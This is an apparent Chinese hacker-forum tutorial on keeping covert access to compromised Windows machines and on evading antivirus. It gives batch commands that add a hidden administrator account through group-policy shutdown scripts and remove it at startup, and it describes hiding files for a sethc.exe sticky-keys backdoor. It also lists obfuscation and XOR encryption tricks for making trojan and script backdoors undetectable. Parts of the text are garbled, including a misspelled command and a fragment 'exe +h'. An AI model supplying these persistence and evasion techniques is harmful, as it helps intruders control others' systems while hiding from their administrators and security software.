后门技术和混淆技术个人浅谈
后门我想这个大家都知道吧!就不解释了!不知道的可以问我们的百度老师!当大家入侵主机都会给主机留后门吧!方面以后进入!可是木马是毕竟是恶意程序!就算是免杀!时间长了杀毒软件更新也会被杀的!所以要长久控制就要安装隐形后门!老鸟就飘过吧!呵呵!
下面要教大家建立无法检查的隐藏后门原理,利用开关机脚本创建属于自己的管理员账号!入侵时我们都会搞到管理员账号密码。先建立个文本输入下面的代码:
@echo off(禁止用户回显信息)
net user hxl 77169 /add
net loaclgroup administrators hxl /add
原创文章就这个麻烦 代码还得自己打.....
ok了吧!保存为bat的批处理 这是关机脚本 下面再同理创建开机脚本
@echo off
net user hxl /del
然后点开始运行gpedit.msc 启动组策略!
展开计算机配置win配置脚本(启动 关机)
点启动属性点击显示文件目录改为刚才创建的脚本
应用就生效了同理关机脚本也修改
如果肉鸡管理员是位菜鸟就可以搞定了!但是如果是位行内人士!就得换方法了!
介绍一个特殊的后门账号
让开机时不让管理员检测到我们添加账号了!
exe +h
Attrib c:\windows\System32\Dllcache\Sethc.exe +h
这个是将sethc外挂工具换成explorer
紧接着就可以使用shift后门工具了!
看来这点内容满足不了大家,下面浅谈下使用代码混淆技术免杀脚本后门,这是一种用于目标代码和软件知识产权保护的交换技术!
不会改动源程序功能! 免杀里面的花指令就是这门技术的一种!
还有这个和加密是不一样的!!大家别混了!
加密是防止未经授权使用只能非法使用
我们要讲的是混淆技术!
分为4种!!哦!
1 词法交换 其实就是捣乱函数变量 嘻嘻!
2 控制流交换 替换循环时的代码
3 数据交换 数组 变量之间交换 ...
4 类结构交换
概念就这些了。。。
具体操作呢...工具打开木马服务端
根据上面的浅谈下实践
第一种:添加极品代码或注释
这里就是,添加注释
"byhxl77169"这样的极品代码就可以了
二 语句的续行,加入空白字符
适当位置保持断行缩进即可免杀
使用下面线空格tab...还有:号 差点忘了
三 变量 字符串 函数名 混淆
使用字符分割 重组 变化
大小改变
变量赋值
四 代码段交换 指令交换 函数顺序改变混淆
记住要 1对1 交换哦!!!
五 加密混淆
大家都知道杀毒软件,有启发式扫描技术,所以混淆属于多态技术,所以需要加密,简单的加密方法 ascll 码交换加密无效指加密、异或加密。
混淆技术相关的太多在这里不能全部说清楚!等以后慢慢说吧!
混淆学好了,免杀不错的!这里说的比较浅!适合新手学习!!
页:
[1]